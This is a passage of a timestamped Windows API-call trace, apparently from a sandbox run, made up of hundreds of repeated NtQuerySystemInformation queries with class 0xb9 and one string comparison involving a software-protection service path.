SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0281.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x58, ResultLength=0x0) [0281.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0281.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0281.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0281.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0281.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0281.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0281.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0281.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0281.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x28, ResultLength=0x0) [0281.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x28, ResultLength=0x0) [0281.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0281.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0281.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0281.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x20, ResultLength=0x0) [0281.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x20, ResultLength=0x0) [0281.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x20, ResultLength=0x0) [0281.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0281.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0281.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0281.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0281.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0281.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0281.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0281.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0281.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0281.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0281.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0281.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0281.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0281.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0281.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce48, Length=0x50, ResultLength=0x0) [0281.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0281.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0281.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0281.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0281.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0281.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x28, ResultLength=0x0) [0281.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0281.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) [0281.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) [0281.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0281.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0281.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x20, ResultLength=0x0) [0281.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x20, ResultLength=0x0) [0281.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x20, ResultLength=0x0) [0281.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0281.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0281.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0281.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0281.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x50, ResultLength=0x0) [0281.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x38, ResultLength=0x0) [0281.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0281.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0281.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0281.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0281.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x28, ResultLength=0x0) [0281.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x38, ResultLength=0x0) [0281.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x28, ResultLength=0x0) [0281.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x28, ResultLength=0x0) [0281.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x38, ResultLength=0x0) [0281.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0281.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0281.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0281.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0281.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x38, ResultLength=0x0) [0281.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0281.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.616] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd8, Length=0x50, ResultLength=0x0) [0281.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x28, ResultLength=0x0) [0281.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x28, ResultLength=0x0) [0281.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x28, ResultLength=0x0) [0281.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.622] NtQuerySystemInformation 